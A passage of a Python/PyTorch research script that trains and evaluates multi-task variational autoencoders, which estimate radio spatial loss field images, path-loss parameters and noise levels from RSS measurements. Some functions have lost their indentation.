    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image flattened to [num, K0*K1].
    slf = mat['slf_img'][keep].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm = [b_norm, alpha_norm] (shape [num, N+1]).
    ab = mat['ab_norm'][keep]
    return TensorDataset(torch.from_numpy(noisy).float(),
                         torch.from_numpy(clean).float(),
                         torch.from_numpy(slf).float(),
                         torch.from_numpy(ab).float(),
                         torch.from_numpy(noise_cls).long())
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load the image-1 test set, normalized with the training-set range.

    The single ground-truth SLF image is tiled across all samples. The
    .mat file stores samples ordered by noise level: [:500] low,
    [500:1000] mid, [1000:] high — that ordering is how *noise_level*
    slicing works here.

    Raises:
        NotImplementedError: for an unknown *noise_level*.
    """
    mat = sio.loadmat('./data/testing_data_image1.mat')
    # Noisy RSS input, min-max normalized and shaped [num, N, P, P].
    noisy = (mat['RSS'] - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS (decoder target), same normalization and shape.
    clean = (mat['RSS_denoise'] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # One SLF image shared by every sample: tile it to [num, K0*K1].
    slf = mat['slf_img'].reshape(1, self.args.K0 * self.args.K1)
    slf = np.tile(slf, (noisy.shape[0], 1))
    # ab_norm = [b_norm, alpha_norm] (shape [num, N+1]).
    ab = mat['ab_norm']
    noise_cls = np.squeeze(mat['sig_epsilon_class'])
    ranges = {'all': slice(None), 'low': slice(None, 500),
              'mid': slice(500, 1000), 'high': slice(1000, None)}
    if noise_level not in ranges:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    sel = ranges[noise_level]
    noisy = noisy[sel]
    clean = clean[sel]
    slf = slf[sel]
    ab = ab[sel]
    noise_cls = noise_cls[sel]
    return TensorDataset(torch.from_numpy(noisy).float(),
                         torch.from_numpy(clean).float(),
                         torch.from_numpy(slf).float(),
                         torch.from_numpy(ab).float(),
                         torch.from_numpy(noise_cls).long())
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load the image-2 test set, normalized with the training-set range.

    Mirrors load_testing_img1 for a second ground-truth image; samples
    are ordered by noise level in the .mat file ([:500] low, [500:1000]
    mid, [1000:] high).

    Raises:
        NotImplementedError: for an unknown *noise_level*.
    """
    mat = sio.loadmat('./data/testing_data_image2.mat')
    # Noisy RSS input, min-max normalized and shaped [num, N, P, P].
    noisy = (mat['RSS'] - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS target. NOTE(review): this file uses key
    # 'RSS_denoise_norm' while image-1 uses 'RSS_denoise' — presumably a
    # schema difference in the .mat files; confirm against the data.
    clean = (mat['RSS_denoise_norm'] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # One SLF image shared by every sample: tile it to [num, K0*K1].
    slf = mat['slf_img'].reshape(1, self.args.K0 * self.args.K1)
    slf = np.tile(slf, (noisy.shape[0], 1))
    # ab_norm = [b_norm, alpha_norm] (shape [num, N+1]).
    ab = mat['ab_norm']
    noise_cls = np.squeeze(mat['sig_epsilon_class'])
    ranges = {'all': slice(None), 'low': slice(None, 500),
              'mid': slice(500, 1000), 'high': slice(1000, None)}
    if noise_level not in ranges:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    sel = ranges[noise_level]
    noisy = noisy[sel]
    clean = clean[sel]
    slf = slf[sel]
    ab = ab[sel]
    noise_cls = noise_cls[sel]
    return TensorDataset(torch.from_numpy(noisy).float(),
                         torch.from_numpy(clean).float(),
                         torch.from_numpy(slf).float(),
                         torch.from_numpy(ab).float(),
                         torch.from_numpy(noise_cls).long())
def train(self, model, train_loader, optimizer, epoch):
    """Run one training epoch of the multi-task Gaussian VAE.

    Optimizes a weighted sum of: annealed KL divergence, RSS
    reconstruction BCE, SLF image BCE, ab-parameter BCE and noise-level
    cross-entropy, and tracks noise-level classification accuracy.

    Args:
        model: network returning (KLD, RSS, SLF, ab, noise_logits).
        train_loader: yields (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) batches.
        optimizer: optimizer stepping ``model``'s parameters.
        epoch: 1-based epoch index; drives the KL annealing schedule.

    Returns:
        (train_loss, train_kld, train_loss_task0, train_loss_task1,
        train_loss_task2, train_loss_task3, train_acc), each averaged
        over the dataset.
    """
    model.train()
    train_loss = 0  # total loss
    train_kld = 0  # kl-divergence
    train_loss_task0 = 0  # loss for reconstruct RSS
    train_loss_task1 = 0  # loss for SLF image estimation
    train_loss_task2 = 0  # loss for parameters estimation
    train_loss_task3 = 0  # loss for noise level prediction
    train_acc = 0  # accuracy for noise level prediction
    # Batches per epoch; batch_10num makes the KL ramp span 10 epochs.
    batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
    batch_10num = batch_num * 10
    for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
        input_RSS = input_RSS.to(self.device)
        target_RSS = target_RSS.to(self.device)
        target_SLF = target_SLF.to(self.device)
        target_ab = target_ab.to(self.device)
        target_noise_level = target_noise_level.to(self.device)
        optimizer.zero_grad()
        KLD, RSS, SLF, ab, noise_level = model(input_RSS)
        # Per-task sum losses, each normalized by its output dimensionality.
        loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
        loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
        loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
        loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
        # Cyclic KL annealing: the weight ramps linearly from 0, restarting
        # every 20 epochs, and is capped at lambda0.
        loss_weight0 = (((epoch-1) % 20) * batch_num + batch_idx) / batch_10num
        loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
        loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1\
               + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
        # Accumulate the un-averaged (batch-sum) terms for epoch reporting;
        # they are divided by the dataset size after the loop.
        train_loss += loss.item()
        train_kld += KLD.item()
        train_loss_task0 += loss_task0.item()
        train_loss_task1 += loss_task1.item()
        train_loss_task2 += loss_task2.item()
        train_loss_task3 += loss_task3.item()
        _, noise_pred = torch.max(noise_level, 1)
        acc_task3 = (noise_pred == target_noise_level).sum()
        train_acc += acc_task3.item()
        # Backpropagate the per-sample mean loss (divide AFTER accumulating
        # the batch-sum above — order matters here).
        loss /= input_RSS.size(0)
        loss.backward()
        optimizer.step()
        if batch_idx % self.args.log_interval == 0:
            print(
                'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
                    epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
                    100. * batch_idx / len(train_loader),
                    loss.item(),
                    KLD.item() / len(input_RSS),
                    loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
                    loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
    # Convert accumulated sums to per-sample averages.
    train_loss /= len(train_loader.dataset)
    train_kld /= len(train_loader.dataset)
    train_loss_task0 /= len(train_loader.dataset)
    train_loss_task1 /= len(train_loader.dataset)
    train_loss_task2 /= len(train_loader.dataset)
    train_loss_task3 /= len(train_loader.dataset)
    train_acc /= len(train_loader.dataset)
    print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
    print('====> KL divergence: {:.6f}'.format(train_kld))
    print('====> RSS loss: {:.6f}'.format(train_loss_task0))
    print('====> SLF loss: {:.6f}'.format(train_loss_task1))
    print('====> ab loss: {:.6f}'.format(train_loss_task2))
    print('====> noise level loss: {:.6f}'.format(train_loss_task3))
    print('====> noise level Accuracy: {:.4f}'.format(train_acc))
    return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc
def validate(self, model, val_loader, epoch):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
batch_num = int(len(val_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = 0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
    """Evaluate one epoch on *test_loader*; return averaged losses + acc.

    Mirrors train()'s loss computation, including the epoch-dependent KL
    annealing weight. NOTE(review): using the annealed KL weight at test
    time makes the reported test loss vary with *epoch* even for a fixed
    model — confirm this is intended.

    Args:
        model: network returning (KLD, RSS, SLF, ab, noise_logits).
        test_loader: yields (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) batches.
        epoch: 1-based epoch index; drives the KL weight (see above).

    Returns:
        (test_loss, test_kld, test_loss_task0, test_loss_task1,
        test_loss_task2, test_loss_task3, test_acc), averaged per sample.
    """
    model.eval()
    test_loss = 0  # total loss
    test_kld = 0  # KL-divergence
    test_loss_task0 = 0  # loss for reconstruct RSS
    test_loss_task1 = 0  # loss for SLF image estimation
    test_loss_task2 = 0  # loss for parameters estimation
    test_loss_task3 = 0  # loss for noise level prediction
    # Same annealing bookkeeping as train() so the KL weight matches.
    batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
    batch_10num = batch_num * 10
    with torch.no_grad():
        for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            target_noise_level = target_noise_level.to(self.device)
            KLD, RSS, SLF, ab, noise_level = model(input_RSS)
            # Per-task sum losses, normalized by output dimensionality.
            loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
                    self.args.N * self.args.P * self.args.P)
            loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
            loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
            # Epoch-dependent KL weight (ramps from 0, capped at lambda0).
            loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
            loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
            loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
                + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
            # Accumulate batch-sum terms; averaged after the loop.
            test_loss += loss.item()
            test_kld += KLD.item()
            test_loss_task0 += loss_task0.item()
            test_loss_task1 += loss_task1.item()
            test_loss_task2 += loss_task2.item()
            test_loss_task3 += loss_task3.item()
    # Convert accumulated sums to per-sample averages.
    test_loss /= len(test_loader.dataset)
    test_kld /= len(test_loader.dataset)
    test_loss_task0 /= len(test_loader.dataset)
    test_loss_task1 /= len(test_loader.dataset)
    test_loss_task2 /= len(test_loader.dataset)
    test_loss_task3 /= len(test_loader.dataset)
    test_acc = self.test_accuracy(model, test_loader)
    print('====> Test set loss: {:.6f}'.format(test_loss))
    print('====> Test set KL divergence: {:.6f}'.format(test_kld))
    print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
    print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
    print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
    print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
    print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
    return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc
def train_save(self):
"""Train the MGVAE model end-to-end, checkpoint it, and persist per-epoch
loss curves for the train/val/test splits and the two held-out test images."""
model = MGVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
# Xavier-initialise every linear / (transposed) conv layer; zero biases.
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
# Quarter the LR whenever validation loss plateaus for 10 epochs (floor 1e-5).
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
# Per-epoch metric histories, written to disk after training.
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
# Best-model tracking keyed on validation SLF MAE (lower is better).
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs+1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc = self.train(model,
train_loader,
optimizer,
epoch)
train_set.append([train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
# LR scheduler is driven by the total validation loss.
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader, epoch)
test_set.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader1, epoch)
test_set1.append([test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader2, epoch)
test_set2.append([test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
# Periodic checkpoint every save_freq epochs.
if epoch % self.args.save_freq == 0:
# NOTE(review): self.path presumably already ends with '/', so this
# yields a double slash in the checkpoint name — harmless but
# inconsistent with model_path above; confirm before changing.
ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
# Keep the weights with the lowest validation SLF MAE seen so far.
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
# Persist metric histories: 7 columns for train/test rows, 3 for val rows.
train_loss = np.asarray(train_set).reshape(-1, 7)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 7)
test_loss1 = np.asarray(test_set1).reshape(-1, 7)
test_loss2 = np.asarray(test_set2).reshape(-1, 7)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
*_, noise_pred = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
    """Load the best saved MGVAE checkpoint and evaluate it.

    Evaluates the general testing set and the two held-out test images,
    saving target-vs-reconstruction SLF image grids and printing SLF
    RMSE/MAE, ab RMSE and noise-level accuracy for each split.

    noise_level: 'all', 'low', 'mid' or 'high' — forwarded to load_data()
    and encoded into the saved image file names.
    """
    model = MGVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    model = model.to(self.device)
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    model.load_state_dict(torch.load(model_path, map_location=self.device))
    model.eval()
    *_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
    # File-name code for the noise level: 0 = all classes, 1/2/3 = low/mid/high.
    noise_class = {'low': 1, 'mid': 2, 'high': 3}.get(noise_level, 0)
    # The three splits share the exact same evaluation logic; only the
    # file-name tag and the printed header differ.
    self._evaluate_split(model, test_loader, '', noise_class, noise_level, 'Testing Set')
    self._evaluate_split(model, test_loader1, '1', noise_class, noise_level, 'image 1')
    self._evaluate_split(model, test_loader2, '2', noise_class, noise_level, 'image 2')

def _evaluate_split(self, model, loader, tag, noise_class, noise_level, label):
    """Evaluate one data split: save SLF comparison images and print metrics.

    tag: suffix inserted in the reconstruction image file name ('', '1', '2').
    label: split name used in the printed header.
    """
    slf_rmse = 0
    slf_mae = 0
    ab_rmse = 0
    # Inference only: no autograd graph needed.
    with torch.no_grad():
        for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(loader):
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            # target_noise_level is handled inside test_accuracy() below.
            KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
            # Save the first (up to) 8 target SLF images above their reconstructions.
            n = min(target_RSS.size(0), 8)
            comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
                                    SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
            save_image(comparison.cpu(),
                       self.path + 'reconstruction_SLF' + tag + '_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
                       nrow=n)
            # Error sums normalised per output dimensionality; averaged below.
            slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
    slf_rmse = np.sqrt(slf_rmse / len(loader.dataset))
    slf_mae /= len(loader.dataset)
    ab_rmse = np.sqrt(ab_rmse / len(loader.dataset))
    noise_acc = self.test_accuracy(model, loader)
    print('====> Test for ' + label + ':')
    print('====> Noise_level: ' + noise_level)
    print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
    print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
    print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
    print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# runner for Multi-task Laplacian VAE
class MLVAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MLVAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
    """Create DataLoaders for training, validation and the three test sets.

    The training data is split 90/10 into train/val with a seeded generator
    so the split is reproducible; its min/max normalization statistics are
    reused for every test set.

    Returns (train_loader, val_loader, test_loader, test_loader1, test_loader2).
    """
    dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
    train_size = int(len(dataset) * 0.9)
    # Bug fix: use the exact remainder instead of int(len * 0.1) — the two
    # truncated sizes need not sum to len(dataset), in which case
    # random_split raises a ValueError.
    val_size = len(dataset) - train_size
    dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
                                              generator=torch.Generator().manual_seed(self.args.seed))
    dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)

    def _make_loader(ds, shuffle):
        # Shared loader settings; only the test sets keep their original order.
        return DataLoader(ds, batch_size=self.args.batch_size, shuffle=shuffle, num_workers=2)

    train_loader = _make_loader(dataset_train, True)
    val_loader = _make_loader(dataset_val, True)
    test_loader = _make_loader(dataset_test, False)
    test_loader1 = _make_loader(dataset_test1, False)
    test_loader2 = _make_loader(dataset_test2, False)
    print("Data Loaded!")
    return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
    """Load ./data/training_data.mat and build the training TensorDataset.

    Returns (dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min);
    the min/max statistics are returned so the test loaders can reuse the
    training normalization.
    """
    raw = sio.loadmat('./data/training_data.mat')

    def _minmax_norm(arr):
        # Per-column min/max over samples, then scale into [0, 1].
        hi = np.amax(arr, axis=0, keepdims=True)
        lo = np.amin(arr, axis=0, keepdims=True)
        return (arr - lo) / (hi - lo), hi, lo

    # Normalized noisy RSS measurement input, reshaped to [num_sample, N, P, P].
    rss, RSS_max, RSS_min = _minmax_norm(raw['RSS'])
    rss = rss.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Normalized clean RSS (target for the decoder), same layout.
    rss_clean, RSS_denoise_max, RSS_denoise_min = _minmax_norm(raw['RSS_denoise'])
    rss_clean = rss_clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image flattened to [num_sample, K0 * K1].
    slf = raw['slf_img'].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm = [b_norm, alpha_norm]: bias + path-loss exponent targets.
    ab = raw['ab_norm']
    # Integer noise-level class per sample (classes 0, 1, 2).
    noise = np.squeeze(raw['sig_epsilon_class'])
    dataset = TensorDataset(torch.from_numpy(rss).float(),
                            torch.from_numpy(rss_clean).float(),
                            torch.from_numpy(slf).float(),
                            torch.from_numpy(ab).float(),
                            torch.from_numpy(noise).long())
    return dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data.mat, keep only the requested noise level,
    and normalize with the training-set min/max statistics.

    noise_level: 'all', 'low', 'mid' or 'high'; anything else raises
    NotImplementedError.  Returns a TensorDataset of
    (input_RSS, denoised_RSS, slf_img, ab, noise_class).
    """
    raw = sio.loadmat('./data/testing_data.mat')
    # Noise-level class per sample (0, 1 or 2).
    classes = np.squeeze(raw['sig_epsilon_class'])
    # Boolean sample mask for each supported noise-level name.
    masks = {'all': (classes == 0) | (classes == 1) | (classes == 2),
             'low': classes == 0,
             'mid': classes == 1,
             'high': classes == 2}
    if noise_level not in masks:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    idx = masks[noise_level]
    classes = classes[idx]
    # Noisy RSS input, normalized with training statistics.
    rss = (raw['RSS'][idx] - RSS_min) / (RSS_max - RSS_min)
    rss = rss.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS decoder target, likewise normalized.
    rss_clean = (raw['RSS_denoise'][idx] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    rss_clean = rss_clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image flattened to [num_sample, K0 * K1].
    slf = raw['slf_img'][idx].reshape(-1, self.args.K0 * self.args.K1)
    # [b_norm, alpha_norm] targets, shape [num_sample, N + 1].
    ab = raw['ab_norm'][idx]
    return TensorDataset(torch.from_numpy(rss).float(),
                         torch.from_numpy(rss_clean).float(),
                         torch.from_numpy(slf).float(),
                         torch.from_numpy(ab).float(),
                         torch.from_numpy(classes).long())
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data_image1.mat for the first held-out image.

    The fixed slices below imply samples are ordered low/mid/high in blocks
    of 500.  noise_level selects one of those blocks ('all' keeps every
    sample); unknown names raise NotImplementedError.
    """
    raw = sio.loadmat('./data/testing_data_image1.mat')
    # Noisy RSS input, normalized with the training statistics.
    rss = (raw['RSS'] - RSS_min) / (RSS_max - RSS_min)
    rss = rss.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS decoder target, likewise normalized.
    rss_clean = (raw['RSS_denoise'] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    rss_clean = rss_clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # One ground-truth SLF image for the whole set: tile it per sample.
    slf = raw['slf_img'].reshape(1, self.args.K0 * self.args.K1)
    slf = np.tile(slf, (rss.shape[0], 1))
    # [b_norm, alpha_norm] targets and integer noise classes (0, 1, 2).
    ab = raw['ab_norm']
    noise = np.squeeze(raw['sig_epsilon_class'])
    slices = {'all': slice(None),
              'low': slice(None, 500),
              'mid': slice(500, 1000),
              'high': slice(1000, None)}
    if noise_level not in slices:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    sel = slices[noise_level]
    return TensorDataset(torch.from_numpy(rss[sel]).float(),
                         torch.from_numpy(rss_clean[sel]).float(),
                         torch.from_numpy(slf[sel]).float(),
                         torch.from_numpy(ab[sel]).float(),
                         torch.from_numpy(noise[sel]).long())
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data_image2.mat for the second held-out image.

    Mirrors load_testing_img1: samples are selected by fixed 500-sample
    slices per noise level; unknown names raise NotImplementedError.
    """
    raw = sio.loadmat('./data/testing_data_image2.mat')
    # Noisy RSS input, normalized with the training statistics.
    rss = (raw['RSS'] - RSS_min) / (RSS_max - RSS_min)
    rss = rss.reshape(-1, self.args.N, self.args.P, self.args.P)
    # NOTE(review): this file uses key 'RSS_denoise_norm' where image1 uses
    # 'RSS_denoise' — presumably matching the .mat contents; confirm.
    rss_clean = (raw['RSS_denoise_norm'] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    rss_clean = rss_clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # One ground-truth SLF image for the whole set: tile it per sample.
    slf = raw['slf_img'].reshape(1, self.args.K0 * self.args.K1)
    slf = np.tile(slf, (rss.shape[0], 1))
    # [b_norm, alpha_norm] targets and integer noise classes (0, 1, 2).
    ab = raw['ab_norm']
    noise = np.squeeze(raw['sig_epsilon_class'])
    slices = {'all': slice(None),
              'low': slice(None, 500),
              'mid': slice(500, 1000),
              'high': slice(1000, None)}
    if noise_level not in slices:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    sel = slices[noise_level]
    return TensorDataset(torch.from_numpy(rss[sel]).float(),
